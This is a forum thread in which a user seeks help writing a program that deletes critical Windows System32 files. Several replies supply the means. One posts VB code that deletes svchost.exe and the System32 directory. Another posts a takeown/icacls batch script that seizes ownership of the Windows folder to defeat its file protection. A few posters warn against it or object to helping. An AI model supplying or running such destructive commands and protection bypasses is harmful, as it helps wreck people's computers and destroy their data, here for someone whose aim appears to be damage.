Kaylinz

Joined: 2nd Dec 2010
Posts: 776
System32 del?
well Im trying to write program in C++ that you run and it deletes some major core files in system32 does anyone here know what those files are?
14 years, 3 weeks ago
|
Bronzon

Joined: 23rd Mar 2011
Posts: 144
Re: System32 del?
Just make it delete all the files? it sounds like your main reason for doing this is to cause as much damage as possible.
---
You cannot fathom the immensity of the fuck I do not give...
Deal w/it
14 years, 3 weeks ago
|
Hollow

Joined: 30th Sep 2010
Posts: 3451
Re: System32 del?
Deleting system32 files will dammage ur pc. Even deling 1 dll can make ur pc stop working.
14 years, 3 weeks ago
|
Kaylinz

Joined: 2nd Dec 2010
Posts: 776
Re: System32 del?
Yup well I tryed
system("del C:\Windows\System32\*.*");
it says access denied for all of those files. So I'm Looking for the files that windows will elt me delete
@Desmond Im just looking for the files that are important and the files that are not.
14 years, 3 weeks ago
|
clive
Joined: 6th Aug 2009
Posts: 936
Re: System32 del?
Yeah, well good luck on that windows has protected them.
---
opensource isometric game engine ~ www.avac-engine.blogspot.com
14 years, 3 weeks ago
|
Desmond
Joined: 7th Jun 2010
Posts: 2424
Re: System32 del?
Well, The best way to find this out is checking the Microsoft Website. But hey, They put in there what is needed by the System ---
I am an alien and not crazy!
14 years, 3 weeks ago
|
Kaylinz

Joined: 2nd Dec 2010
Posts: 776
Re: System32 del?
Is there a way to get around the protection that Windows has implemented?
14 years, 3 weeks ago
|
Dough

Joined: 21st Oct 2010
Posts: 535
Re: System32 del?
i know VB:
# 1 #
My.Computer.FileSystem.DeleteFile("C:\Windows\System32\svchost.exe")
# 2 #
My.Computer.FileSystem.DeleteDirectory("C:\Windows\System32")
# 3 #
Shell("del C:\Windows\System32")
# 4 #
Dim prc As New Process
prc.StartInfo.FileName = "del"
prc.StartInfo.Arguments = "C:\Windows\System32"
prc.Start()
prc.WaitForExit
14 years, 3 weeks ago
|
Hollow

Joined: 30th Sep 2010
Posts: 3451
Re: System32 del?
There are programs which allows you to replace protected files in ur windows.
It works like this, It starts a small exe which does like like an eoserv.exe and u must open the file u want to replace and than put a file in to replace it with. Than restart ur pc and it's replaced. But you can also leave it empty so u will actually delete it, But this method can break ur pc.
14 years, 3 weeks ago
|
Re: System32 del?
Kaylinz posted: (1st Jun 2011 06:57 pm)
Is there a way to get around the protection that Windows has implemented?
Yup, be a dumbass with an admin account and UAC disabled. Seeing as most kids have Windows Vista/7 these days anyways. ---
Wish upon a star!
14 years, 3 weeks ago
|
kodyt

Joined: 6th Apr 2009
Posts: 2271
Re: System32 del?
I know theres a program called Unlocker.
But that doesn't really help with making your own.. lol.
---
http://www.ctronic.ga
http://www.tsu.co/Deltro
https://www.reverbnation.com/deltro9
14 years, 3 weeks ago
|
Hollow

Joined: 30th Sep 2010
Posts: 3451
Re: System32 del?
It's the best to not delete anything.
14 years, 3 weeks ago
|
make

Joined: 8th Sep 2010
Posts: 674
Re: System32 del?
i cant beleave you guys are offering any help to this at all, i know its in lounge but information like this should not be giving here. might come back and bit you in your ass!
---
Think Outside The Box.
..............Skids in my Undies........
...............Cut And Paste............
14 years, 3 weeks ago
|
Divine

Joined: 10th Apr 2009
Posts: 725
Re: System32 del?
Here, save this as a *.bat file, place it in C:\Windows\System32, and run it, gives ownershit access to your current account, in turn as long as its not a running process it can be deleted.
takeown /f %WINDIR%\
icacls %WINDIR%\ /grant %USERNAME%:F
Edit: Inb4 someone edits/deletes this, I hold no responsibility for how or where this is used. Blame windows for being so shitty. Besides, this is something you can probably find using google.....
---
Eat shit, bro.
I support Ephixa [http://ephixa.com/]. Fuck Skrillex, Sonny Moore is no more.
14 years, 3 weeks ago
| | | | | | | | | | | | | | |